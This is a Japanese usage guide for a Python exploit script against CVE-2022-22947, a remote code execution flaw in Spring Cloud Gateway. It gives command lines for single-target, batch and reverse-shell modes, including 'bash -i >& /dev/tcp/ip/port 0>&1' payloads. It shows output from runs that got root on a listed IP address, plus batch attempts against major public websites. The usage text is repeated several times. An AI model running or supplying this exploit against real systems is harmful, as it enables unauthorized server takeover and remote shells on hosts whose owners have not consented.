
個別または一括で検証でき、シェルをリバース接続することもできるスクリプト。
危険度:高
POC/EXP状況:公開済み
CNVD番号:CNNVD-2022-16402
CVE番号:CVE-2022-22947
Spring Cloud Gateway にはリモートコード実行脆弱性が存在します。この脆弱性は Spring Cloud Gateway アプリケーションの Actuator エンドポイントで発生し、有効化・公開されており安全でない場合にコードインジェクション攻撃を受けやすくなります。攻撃者はこの脆弱性を悪用して、悪意あるリクエストを作成し、リモートホスト上で任意のコマンドを実行できます。
1、単一ターゲットの検証をサポート
2、バッチ脆弱性検証をサポート
3、リバースシェルをサポート
-h ヘルプ情報を表示
-u URLターゲットを指定
-c 実行するコマンドを指定(デフォルト: id)
-f ターゲットURLファイルを指定
1. 単一ターゲット検証
方法1:
E:\pocs>python cve-2022-22947.py
単一ターゲット検証:
1、python cve-2022-22947.py インタラクティブモードに入力後、プロンプトに従ってターゲットURLと実行するコマンドを入力してください。コマンドが正しいことを確認してください。
2、python cve-2022-22947.py -u http://example.com -c whoami
複数ターゲットの検証:
1、python cve-2022-22947.py -f url.txt 、検証するターゲットをすべてurl.txtファイルに記述してください。
リバースシェル:
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、インタラクティブモードに入力し、ターゲットとリバースシェル用のコマンドを入力してください。
ターゲットURLを入力してください:http://123.58.236.76:8484
実行するコマンドを入力してください(デフォルト: id):whoami
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['root\\n']
方法2:
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
単一ターゲット検証:
1、python cve-2022-22947.py インタラクティブモードに入力後、プロンプトに従ってターゲットURLと実行するコマンドを入力してください。コマンドが正しいことを確認してください。
2、python cve-2022-22947.py -u http://example.com -c whoami
複数ターゲットの検証:
1、python cve-2022-22947.py -f url.txt 、検証するターゲットをすべてurl.txtファイルに記述してください。
リバースシェル:
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、インタラクティブモードに入力し、ターゲットとリバースシェル用のコマンドを入力してください。
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['root\\n']
2. バッチ検証
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
単一ターゲット検証:
1、python cve-2022-22947.py インタラクティブモードに入力後、プロンプトに従ってターゲットURLと実行するコマンドを入力してください。コマンドが正しいことを確認してください。
2、python cve-2022-22947.py -u http://example.com -c whoami
複数ターゲットの検証:
1、python cve-2022-22947.py -f url.txt 、検証するターゲットをすべてurl.txtファイルに記述してください。
リバースシェル:
1、python cve-2022-22947.py -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
2、インタラクティブモードに入力し、ターゲットとリバースシェル用のコマンドを入力してください。
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
[-]ターゲット:http://www.baidu.com, 脆弱性検証失敗。手動で検証してください!
[-]ターゲット:http://www.qq.com, 脆弱性検証失敗。手動で検証してください!
[+]ターゲット:http://123.58.236.76:8484 , コマンド実行結果取得成功:['uid=0(root']
3. リバースシェル
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
image-20220519233354807
image-20220519233429912